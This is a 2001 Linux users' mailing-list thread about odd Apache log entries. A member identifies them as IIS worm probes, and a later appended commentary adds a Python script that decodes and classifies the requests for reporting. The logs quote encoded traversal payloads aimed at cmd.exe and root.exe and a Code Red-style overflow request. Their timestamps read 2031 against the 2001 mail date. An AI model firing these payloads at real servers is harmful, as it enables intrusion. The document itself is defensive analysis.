[wplug] weird apache logs

Shawn Djernes shawn at sdjernes.tzo.com
Thu Dec 27 10:49:36 EST 2001


That is exactly what those are.  That is trying to find the root.exe program
installed by another of those nasty little buggers and run some tests to see
if it can break into IIS.  I would use whois and nslookup to find them and
then report the computer to the ISP or company owning its IP.  That is all
you can do.

Shawn Djernes

-----Original Message-----
From: wplug-admin at wplug.org [mailto:wplug-admin at wplug.org] On Behalf Of
coldfire
Sent: Thursday, December 27, 2001 2:19 PM
To: wplug at wplug.org
Subject: [wplug] weird apache logs


i've been getting some crazy get requests in my logs ... my guess is that
they are some kind of nt or iis exploits ... just not sure ... here are
some ..


165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 273
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

another:

209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 317

...

i've received several of these from ips which have no dns entries or
rdns entries ... i'm not worried.  just curious.


coldie

_______________________________________________
wplug mailing list
wplug at wplug.org
http://www.wplug.org/mailman/listinfo/wplug
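The requests quoted above are the canonical probe sequence of the Nimda worm (root.exe in /scripts and /MSADC, then sixteen encoded traversals to winnt/system32/cmd.exe) and, for the default.ida request, the Code Red worm. The following is an added example, not code from either poster or from the wplug list, that parses Apache common-log lines, decodes the request target the way a vulnerable IIS 4/5 did (percent-decoding twice, and accepting the overlong two-byte UTF-8 forms of "/" and "\"), and tags the probes per source IP so the "who do I report" step Shawn describes starts from a de-duplicated list. The sample log lines are constructed from the post (rejoined to one line each, plus one benign request); the decoder approximates IIS behaviour rather than reproducing it exactly, and the family labels and function names are this example's own.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Constructed sample input: a few of the posted entries rejoined to one
# line each, plus one benign request (10.0.0.5) that must not be flagged.
SAMPLE_LOG = """\
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 317
10.0.0.5 - - [27/Dec/2031:01:00:00 -0500] "GET /index.html HTTP/1.0" 200 1234
""".splitlines()

# Apache common log format: ip ident user [timestamp] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def iis_decode(path: str, rounds: int = 2) -> str:
    """Approximate how a vulnerable IIS 4/5 canonicalised a path (assumption:
    a simplified model, not a byte-exact reimplementation).

    1. Percent-decode `rounds` times, so %255c -> %5c -> '\\' (the "double
       decode" bug).  Malformed escapes such as %%35%63 fall out naturally:
       the first pass leaves the lone '%' and yields %5c, the second decodes it.
    2. Accept overlong two-byte UTF-8: 0xC0/0xC1 followed by any byte becomes
       ((b1 & 0x1F) << 6) | (b2 & 0x3F), so %c0%af -> '/' and %c1%9c -> '\\'
       (the "Unicode traversal" bug).  %c1%1c is decoded the same way even
       though 0x1C is not a valid continuation byte.
    """
    raw = path.encode("latin-1")
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def classify(target: str) -> Optional[str]:
    """Return a probe family label for a request target, or None if benign.
    Matching is done on the decoded path, so a naive grep for '../winnt'
    that misses %c0%af or %%35%63 is not the basis of the decision."""
    path, _, query = target.partition("?")
    decoded = iis_decode(path).replace("\\", "/").lower()
    if decoded.endswith("/default.ida") and "%u" in query:
        return "code-red"            # .ida buffer overflow with %u-encoded payload
    if decoded.endswith("/root.exe"):
        return "nimda-root.exe"      # cmd.exe copy left behind by an earlier infection
    if decoded.endswith("/cmd.exe"):
        # traversal out of a script directory, or a /c /d drive-letter virtual dir
        return "nimda-traversal" if "/../" in decoded else "nimda-cmd.exe"
    return None


def scan(lines: List[str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group flagged requests by source IP: ip -> [(timestamp, family, status)]."""
    hits: Dict[str, List[Tuple[str, str, str]]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        family = classify(m["target"])
        if family:
            hits[m["ip"]].append((m["ts"], family, m["status"]))
    return dict(hits)


if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        families = sorted({fam for _, fam, _ in events})
        print(f"{ip}: {len(events)} probe(s) {families}  -> whois {ip}")
```

Two things the decoded view makes visible. First, every variant from one source resolves to the same target, so the sixteen lines are one scanner, not sixteen, and the status column (404 and 400 from Apache) confirms nothing here reached an IIS code path. Second, the two 400s are the %%35%63 and %%35c forms: Apache rejected the malformed escape before routing, which is why those two look different from the rest. When reporting the source, as Shawn suggests, bear in mind that a host sending this sequence is itself an infected machine, so the whois contact is being told about their own compromise.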